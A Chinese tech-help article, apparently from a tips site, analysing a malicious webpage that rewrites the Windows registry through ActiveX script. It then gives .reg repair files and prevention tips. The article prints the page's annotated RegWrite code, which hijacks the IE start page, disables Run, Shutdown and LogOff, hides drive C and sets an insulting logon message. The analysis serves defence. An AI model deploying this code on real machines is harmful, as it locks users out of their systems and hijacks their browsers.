浏览网页注册表被修改之迷及解决办法_注册表

  浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:http://www.某某.com/default.htm ,你真有生不如死的感觉!

进入该网页会被:

  1.修改开始菜单

  1)禁止“关闭系统”
  2)禁止“运行”
  3)禁止“注销”

  2.隐藏C盘——你的C盘找不到了

  3.禁止使用注册表编辑器regedit

  4.禁止使用DOS程序

  5.使系统无法进入“实模式”

  6.禁止运行任何程序

  7.将IE浏览器的首页改为http://www.某某.com/,收藏夹中也被加入该网址。

  那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

注:下面代码是将你的IE默认连接首页改为http://www.某某.com/
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.某某.com/");

注:以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");
注:上面一行是会在窗口中显示出来的文字

注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!

注:下面代码用来将其网页增加到受害者的收藏夹中

var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.某某.com", "http://www.某某.com");

  由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。

受害用户的修复方法:

  1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。

  2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。

unlock.reg文件内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

预防办法:

  1.要避免中招,关键是不要轻易去一些自己并不了解的站点。

  2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止

  3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。

  4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!

  加锁方法如下:

  (1)运行注册表编辑器regedit.exe;
  (2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。

  解锁方法如下:

  用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

  存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!

说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。

 

时间: 2024-10-02 20:15:51

浏览网页注册表被修改之迷及解决办法_注册表的相关文章

注册表被修改的原因及解决办法

一.注册表被修改的原因及解决办法 其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果. 1.IE默认连接首页被修改 IE浏览器上方的标题栏被改成"欢迎访问******网站"的样式,这是最常见的篡改手段,受害者众多. 受到更改的注册表项目为: HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMainStart Page HKEY_CURRENT_USERSoftwareMi

IE与注册表被锁定的解决办法_注册表

本文主要将讨论对IE浏览器及注册表修改的几种手段及相应解决办法本文要求您对注册表的相关知识略知一二 一.IE标题栏被修改请打开你的注册表工具(在运行菜单中输入regedit,不能用regedit者见后)查找: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 这两个地方,将其中的Windows Title主

不能查看隐藏文件的解决办法_注册表

将下面这段代码复制到.txt文本文档中,然后把后缀名改为.reg,双击运行即可.-------------------------------------------------------------------------------- 复制代码 代码如下: Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\

网页中层或菜单被Flash挡住的解决办法

菜单|解决|网页 网页中层或菜单被Flash挡住的解决办法 网页层或菜单经常被flash盖住部分看不到,影响美观,在flash代码中加入以下代码: <param name="wmode" value="Opaque"> 即可解决被flash遮挡看不到图层或菜单的问题了. 下面是代码例子,加入红色部分: OBJECT代码: <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000

常见的注册表修改大全第1/3页_注册表

<开始菜单及相关设置>  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]  "NoRecentDocsMenu"=dword:00000001(隐藏开始->文档菜单)  "NoRecentDocsHistory"=dword:00000001(禁止将打开的文档存入历史记录)  "ClearRecentDocsOnExit&quo

修改注册表显示被病毒恶意隐藏文件解决办法

问题描述 近来,有一些网友发现自己硬盘上的文件全被隐藏了,打开空白一片,但是查看其硬盘属性却显示空间已经在使用中,而且设置"显示隐藏的文件"也无法查看,在这种情况下如何显示隐藏的文件呢? 首先打开"任务管理器",应该有个svohost.exe进程,把它结束掉.到c:/windows/system322里找到svohost.exe把它删除. 断开网络连接,然后打开"任务管理器",应该有个svohost.exe进程,把它结束掉.到c:/windows

如何修改XP 远程管理默认端口_注册表

自Windows 2000开始,微软就提供一项终端服务(Terminal Server)这项服务可以将远程的桌面传递到本地.通过该服务,可视化的远程管理可以非常方便的实现.继Windows 2000之后,Windows XP也提供这项服务.在Windows XP 中的Terminal Server Client程序比Windows 2000中的那个有了进一步的发展,许多功能都强大了许多. Windows XP 中的Terminal Server Client程序主要的新特性有:  1)可以将目标

Win7浏览网页时提示“是否停止运行此脚本”怎么解决?

  电脑使用时间久了,出现各种各样的问题是在所难免的,最常见的就是当我们打开IE浏览网页内容时,会弹出"是否停止运行此脚本",那么当Win7浏览网页时提示"是否停止运行此脚本"该怎么解决呢?不懂的朋友来看看下面文章吧! 方法/步骤: 1.点击开始菜单中的"运行"选项,然后输入"Regedit"然后回车就会打开注册表编辑器了. 2.然后在注册表中定位到以下项(可以一个一个展开):HKEY_CURRENT_USERSoftware

[注册表]原理结构及恢复IE浏览器实例_注册表

摘要:本文分析了与IE浏览器相关的Windows注册表的键,以解决目前常见的上网时IE设置被修改后无法复原问题. 常在网上浏览的网友,大多遇到过这样令人头疼的问题:当访问完某个主页时,IE设置被莫名其妙地修改,如标题和默认主页被更换.右键快捷菜单增加了某些内容.系统启动时增加了弹出框.更有甚者,您的默认主页选项被disable(不能更改)了等等.不少网友迫于无奈,只好将整个系统格式化掉,代价实在太大了.事实上,这些更改均是利用改写系统注册表实现的. 本文通过介绍系统注册表的原理及注册表编辑器的使